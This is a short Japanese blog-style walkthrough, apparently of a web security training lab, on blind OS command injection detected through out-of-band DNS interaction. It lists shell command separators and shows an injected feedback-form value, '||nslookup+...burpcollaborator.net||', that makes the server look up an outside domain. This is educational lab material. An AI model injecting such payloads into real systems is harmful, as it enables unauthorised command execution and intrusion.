Hello there, ('ω')ノ

 

帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。

 

文字列はコマンドセパレータとして機能して。

コマンドをチェーン化できて。

下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。

&
&&
|
||

 

まずは、下記のページからフィードバックを送信して。

 

 

対象となるリクエストをリピータへ。

 

 

コラボレータを起動して、クリップボードにコピーして。

 

 

下記を追加して、指定されたドメインのDNSルックアップを実行すると。

　||nslookup+mlbbwwapafyrdggz3k7kcv48izoqcf.burpcollaborator.net||

 

 

クリアできた。

 

 

攻撃者は、実行された特定の検索を監視して。

コマンドが正常に挿入されたことを検出できて。

 

 

Best regards, (^^ゞ